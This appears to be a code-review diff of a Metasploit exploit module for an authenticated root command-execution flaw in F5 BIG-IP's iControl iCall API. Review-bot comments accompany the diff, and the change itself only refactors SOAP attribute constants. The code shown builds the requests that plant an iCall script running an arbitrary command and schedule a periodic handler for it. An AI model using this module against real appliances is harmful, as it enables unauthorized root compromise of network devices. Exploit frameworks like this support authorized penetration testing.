diff --git a/modules/exploits/linux/http/f5_icall_cmd.rb b/modules/exploits/linux/http/f5_icall_cmd.rb
index 67f5126cc7..86df148ddf 100644
--- a/modules/exploits/linux/http/f5_icall_cmd.rb
+++ b/modules/exploits/linux/http/f5_icall_cmd.rb
@@ -11,16 +11,22 @@ class Metasploit3 < Msf::Exploit::Remote
 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::FileDropper
 
+ SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" }
+ STRING_ATTRS = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+ LONG_ATTRS = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
+
 def initialize(info = {})
 super(
 update_info(
 info,
 'Name' => "F5 iControl iCall::Script Root Command Execution",
 'Description' => %q{
- This module exploits an authenticated a privilege escalation vulnerability
- in the iControl API on the F5 BIG-IP LTM (and likely other F5 devices). The attacker needs valid
- credentials and the Resource Administrator role. The exploit should work on BIG-IP 11.3.0 - 11.6.0,
- (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references for more details)
+ This module exploits an authenticated privilege escalation
+ vulnerability in the iControl API on the F5 BIG-IP LTM (and likely
+ other F5 devices). This requires valid credentials and the Resource
+ Administrator role. The exploit should work on BIG-IP 11.3.0
+ - 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references
+ for more details)
 },
 'License' => MSF_LICENSE,
 'Author' =>
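Review bot: The three new hash constants introduced at the top of the class are left mutable, yet they are shared by every SOAP request builder in the module, so a stray `merge!` or `[]=` at one call site would silently change the attributes sent by all the others; append `.freeze` to each, e.g. `SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" }.freeze`, and likewise for `STRING_ATTRS` and `LONG_ATTRS`. A one-line comment above the group such as `# iControl SOAP-encoding attributes shared by the iCall::Script / PeriodicHandler request builders` would help a reader who lands here before seeing the call sites. The remainder of `initialize` (authors, references, options) continues outside this hunk.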
@@ -112,13 +118,12 @@ class Metasploit3 < Msf::Exploit::Remote
 def create_script(cmd)
 scriptname = Rex::Text.rand_text_alpha_lower(5)
 create_xml = build_xml do |xml|
- xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
- string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
- xml.scripts(string_attrs) do
+ xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
+ xml.scripts(STRING_ATTRS) do
 xml.parent.namespace = xml.parent.parent.namespace_definitions.first
 xml.item scriptname
 end
- xml.definitions(string_attrs) do
+ xml.definitions(STRING_ATTRS) do
 xml.parent.namespace = xml.parent.parent.namespace_definitions.first
 xml.item cmd
 end
@@ -129,9 +134,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 def delete_script(scriptname)
 delete_xml = build_xml do |xml|
- xml['scr'].delete_script("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
- string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
- xml.scripts(string_attrs) do
+ xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do
+ xml.scripts(STRING_ATTRS) do
 xml.parent.namespace = xml.parent.parent.namespace_definitions.first
 xml.item scriptname
 end
@@ -142,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 def script_exists(scriptname)
 exists_xml = build_xml do |xml|
- xml['scr'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
+ xml['scr'].get_list(SOAPENV_ENCODINGSTYLE)
 end
 res = send_soap_request(exists_xml)
 res && res.code == 200 && res.body =~ Regexp.new("/Common/#{scriptname}")
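Review bot: In the `script_exists` hunk the final line still decides presence with `res.body =~ Regexp.new("/Common/#{scriptname}")`, an unanchored substring match: any existing script whose name merely begins with the random five-letter `scriptname` would be reported as ours, and the method yields a match offset or nil rather than a boolean. This is not introduced by the commit, but since the method is being edited, `res && res.code == 200 && res.body.include?("/Common/#{scriptname}")` drops the needless Regexp construction, and anchoring on whatever delimiter follows the name in the get_list response (not visible here) would remove the prefix ambiguity. `scriptname` comes from `rand_text_alpha_lower`, so regex metacharacters are not a risk today, but if the Regexp is kept, `Regexp.escape(scriptname)` makes that assumption explicit. The method's closing `end` lies outside the hunk.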
@@ -151,18 +155,16 @@ class Metasploit3 < Msf::Exploit::Remote
 def create_handler(scriptname, interval)
 handler_name = Rex::Text.rand_text_alpha_lower(5)
 handler_xml = build_xml do |xml|
- xml['per'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
- string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
- xml.handlers(string_attrs) do
+ xml['per'].create(SOAPENV_ENCODINGSTYLE) do
+ xml.handlers(STRING_ATTRS) do
 xml.parent.namespace = xml.parent.parent.namespace_definitions.first
 xml.item handler_name
 end
- xml.scripts(string_attrs) do
+ xml.scripts(STRING_ATTRS) do
 xml.parent.namespace = xml.parent.parent.namespace_definitions.first
 xml.item scriptname
 end
- long_attrs = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
- xml.intervals(long_attrs) do
+ xml.intervals(LONG_ATTRS) do
 xml.parent.namespace = xml.parent.parent.namespace_definitions.first
 xml.item interval
 end
@@ -173,9 +175,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 def delete_handler(handler_name)
 delete_xml = build_xml do |xml|
- xml['per'].delete_handler("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
- attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
- xml.handlers(attrs) do
+ xml['per'].delete_handler(SOAPENV_ENCODINGSTYLE) do
+ xml.handlers(STRING_ATTRS) do
 xml.parent.namespace = xml.parent.parent.namespace_definitions.first
 xml.item handler_name
 end
@@ -187,7 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 def handler_exists(handler_name)
 handler_xml = build_xml do |xml|
- xml['per'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
+ xml['per'].get_list(SOAPENV_ENCODINGSTYLE)
 end
 res = send_soap_request(handler_xml)
 res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}")
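Review bot: `handler_exists` has the same weakness as its script counterpart: the last line of the hunk, `res.body =~ Regexp.new("/Common/#{handler_name}")`, is an unanchored substring test, so a pre-existing periodic handler whose name starts with our random `handler_name` would be mistaken for the one this module created, which matters because the cleanup path presumably keys off this result. The commit does not touch that logic, but while the method is open, `res && res.code == 200 && res.body.include?("/Common/#{handler_name}")` avoids building a Regexp for a plain literal, and the match should be anchored on the element boundary that follows the name in the get_list reply once that format is confirmed. The method's closing `end` is outside the hunk.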
@@ -200,13 +201,12 @@ class Metasploit3 < Msf::Exploit::Remote
 # if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
 # any other response is considered not vulnerable
 check_xml = build_xml do |xml|
- xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
- attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
- xml.scripts(attrs) do
+ xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
+ xml.scripts(STRING_ATTRS) do
 xml.parent.namespace = xml.parent.parent.namespace_definitions.first
 xml.item
 end
- xml.definitions(attrs) do
+ xml.definitions(STRING_ATTRS) do
 xml.parent.namespace = xml.parent.parent.namespace_definitions.first
 xml.item
 end
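Review bot: The probe assembled here is a genuine `iCall::Script` `create` call carrying an empty `scripts` item and an empty `definitions` item, so the `check` method is an active, state-changing request rather than a read-only version probe; nothing in the hunk establishes whether BIG-IP rejects the empty name or persists an object, and the two comments at the top describe only the 401 and fall-through outcomes. A comment on the `check_xml =` line should make that explicit for operators, e.g. `# NOTE: active probe — sends an iCall::Script create with empty name/definition; confirm the target rejects it rather than persisting an object`. The enclosing `check` method begins before this hunk and its response classification follows after it, so the logic that turns the reply into a Check status is not visible here.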